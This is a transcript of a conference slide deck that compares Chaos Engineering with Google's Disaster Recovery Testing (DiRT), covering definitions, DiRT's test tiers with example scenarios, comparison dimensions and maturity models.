Chaos Engineering or DiRT

Slide 1

Slide 1 text

Chaos Engineering or Disaster Recovery Testing Manizales TechTalks

Slide 2

Slide 2 text

Yury Niño Roa Cloud AppMod Engineer @yurynino

Slide 3

Slide 3 text

¿Sigues enojada? Te traje memes. Yo: ¿De cuáles?

Slide 4

Slide 4 text

No content

Slide 5

Slide 5 text

Do you know what is Etymology?

Slide 6

Slide 6 text

Chaos is about complete disorder and confusion. Engineering is about designing, building, and usage of engines, machines, and structures.

Slide 7

Slide 7 text

What do you get when you join the words?

Slide 8

Slide 8 text

Chaos is about complete disorder and confusion. Engineering is about designing, building, and usage of engines, machines, and structures.

Slide 9

Slide 9 text

Chaos Engineering It is the discipline of experimenting on a system in order to build confidence in the system's capability to withstand turbulent conditions in production. https://principlesofchaos.org

Slide 10

Slide 10 text

Disaster is an unexpected event that causes signiﬁcant destruction or adverse consequences. Recovery a return to a normal state of health, mind, or strength. Testing is the action of checking that someone or something is working as it is expected.

Slide 11

Slide 11 text

What do you get when you join the words?

Slide 12

Slide 12 text

Slide 13

Slide 13 text

Disaster Recovery Testing It is a program performed internally at Google, in which a group of engineers plan and execute real and fictitious outages to test the effective response of the involved teams.

Slide 14

Slide 14 text

If I join Cha practices? Am I here to see the same that I could have found in a dictionary?

Slide 15

Slide 15 text

I asked ChatGPT ...

Slide 16

Slide 16 text

No content

Slide 17

Slide 17 text

I asked Gemini ...

Slide 18

Slide 18 text

Focus: Proactive identiﬁcation of systemic weaknesses in complex systems under turbulent conditions. Focus: Test reactive response and recovery procedures in the event of a catastrophic failure or disaster. Disaster Recovery Testing Chaos Engineering

Slide 19

Slide 19 text

Method: Controlled experiments are conducted in production, introducing failures (e.g., network latency, server outages) to observe system behavior and uncover hidden vulnerabilities. Method: Involves simulating a major outage (e.g., data center failure) and testing the ability to restore systems and data within a deﬁned recovery time objective (RTO).. Disaster Recovery Testing Chaos Engineering

Slide 20

Slide 20 text

Goal: To build conﬁdence in the system's ability to withstand unexpected disruptions and improve overall resilience. Goal: To minimize downtime and data loss in the event of a major disruption, ensuring business continuity. Disaster Recovery Testing Chaos Engineering

Slide 21

Slide 21 text

It is not because I work for Google, but let me talk a little bit more about DiRT.

Slide 22

Slide 22 text

What is about DiRT?

Slide 23

Slide 23 text

Disaster Recovery Testing Google tests software and systems, but also people, preparation, processes, and response tools. It's about learning and finding single points of failure—therefore the scope of services and systems is broad. Intentionally disrupt services in order to know how to respond and provide reliability. Established in 2006 to exercise response to production emergencies.

Slide 24

Slide 24 text

Software Modifying live service configurations, or bringing up services with known bugs Infrastructure Stress testing large complex architectures, validating SLOs, and ensuring resilience is maintained during disruption. Access Controls Including security, compliance, and privacy. What does Google Test? People and Workflows Removing people who might have knowledge or experience.

Slide 25

Slide 25 text

Disaster Recovery Testing Testing resilience of a specific system or product [no expected impact external]. Tier 3 Testing resilience dependencies of a shared system or product. Tier 2 Testing resilience of organizational response to an enterprise level event. Tier 1

Slide 26

Slide 26 text

Tier 3 Example: Deploy a bad conﬁguration ﬁle. Scenario A bad configuration file is included in the next release generating more CPU and Memory consumption. This impacts only the users of an experimental feature in a product. Response ● Incident management protocols from service’s owners. ● The continuous testing of the services defined by the owners. ● Validating disaster readiness and response of a service and the team. ● Identification and expansion of standard tests that can be used to de-risk Tier 2 and Tier 1 testing. What can you learn? ● If a team is able to effectively perform IMAG. ● If a service is resilient to a specific class of failure. ● If the service is not overly dependent on a specific resource.

Slide 27

Slide 27 text

Tier 2 Example: Run at Service Level Scenario An unusually large traffic spike degrades the latency of a heavily used shared internal service. The service remains barely within its published SLA for an extended period. Response ● Communication to key service consumers. ● Incident management protocols from service’s owners. ● Emergency serving capacity increases. ● Graceful degradation and external messaging to customers. What can you learn? ● Do service consumers tolerate worst case scenarios, or do they assume the average experience as a baseline? ● Do your alerting and monitoring systems behave the way you want for both service providers and consumers in this scenario?

Slide 28

Slide 28 text

Scenario Redeploy an application that uses Apache Log4j2 with version 2.14.0, which has a security vulnerability [CVE-2021-44228], launch a script that exploit this vulnerability and validate that your controls are able to monitor and generate alerts. Response ● Security team invokes incident management protocols and business continuity plan. ● All impacted users are notified. ● Support staff isolate impacted workstations and issue emergency alternative OS laptops. ● New policies on the fly. Higher demand on shared computing resources. What can you learn? ● Creativity and a culture that promotes flexibility helps a lot. ● Communication matters, especially when time is limited. ● Expect the unexpected. Backup (and restore) essential data automatically. Validate backup and restoration!!! Tier 1 Example: Hacked!

Slide 29

Slide 29 text

You told me that this talk would be about CE vs DiRT Yes, but I have to sell DiRT.

Slide 30

Slide 30 text

How to compare these Practices?

Slide 31

Slide 31 text

Are you sure they are both practices?

Slide 32

Slide 32 text

Dimension: Objective To ensure the system can recover from catastrophic failures (e.g., data center outages). To understand system behavior and improve reliability by intentionally causing failures in a controlled manner. Disaster Recovery Testing Chaos Engineering

Slide 33

Slide 33 text

Dimension: Scope Focuses on business continuity plans, backup systems, and recovery processes. Focuses on distributed systems’ robustness, identifying weaknesses proactively. Disaster Recovery Testing Chaos Engineering

Slide 34

Slide 34 text

Dimension: Scenario Simulates severe, often rare, events such as data loss, hardware failures, or site outages. Simulates everyday failures like service crashes, latency spikes, or network disruptions. Disaster Recovery Testing Chaos Engineering

Slide 35

Slide 35 text

Dimension: Methodology Involves predefined tests and drills to validate recovery plans and timelines. Uses experiments designed to stress the system in various ways, often run continuously or periodically. Disaster Recovery Testing Chaos Engineering

Slide 36

Slide 36 text

So bored How many dimensions are they?

Slide 37

Slide 37 text

Dimension: Automation Often relies on manual or semi-automated procedures and is usually not fully automated. Highly automated, with tools such as Chaos Monkey that run experiments autonomously. Disaster Recovery Testing Chaos Engineering

Slide 38

Slide 38 text

Dimension: Frequency Conducted periodically (e.g., annually or quarterly) as a planned event. Can be conducted frequently, even as part of normal operations, to gain ongoing insights. Disaster Recovery Testing Chaos Engineering

Slide 39

Slide 39 text

Dimension: Measurement Evaluates recovery metrics like Recovery Time Objective (RTO) and Recovery Point Objective (RPO). Assesses system performance, resilience, and the ability to handle stress under failure scenarios. Disaster Recovery Testing Chaos Engineering

Slide 40

Slide 40 text

Dimension: Focus Ensures data integrity, service continuity, and minimal downtime during recovery. Tests system’s ability to self-heal, maintain service levels, and minimize the blast radius of issues. Disaster Recovery Testing Chaos Engineering

Slide 41

Slide 41 text

Dimension: Example Testing if a backup system can restore data after a simulated data center failure. Simulating server outages to see if a distributed system can balance load and maintain performance. Disaster Recovery Testing Chaos Engineering

Slide 42

Slide 42 text

What about the Maturity Assessment?

Slide 43

Slide 43 text

What about the Maturity Assessment?

Slide 44

Slide 44 text

Chaos Engineering Maturity Model

Slide 45

Slide 45 text

Sophistication Elementary Simple Sophisticated Advanced

Slide 46

Slide 46 text

Adoption In the shadows Investment Cultural Expectation Adoption

Slide 47

Slide 47 text

DiRT Maturity Model created by me ...

Slide 48

Slide 48 text

Proprietary + Confidential Introductory Persons Processes Tools Defined Advanced Managed Padawan Jedi Knight Senior Padawan DiRT Maturity Model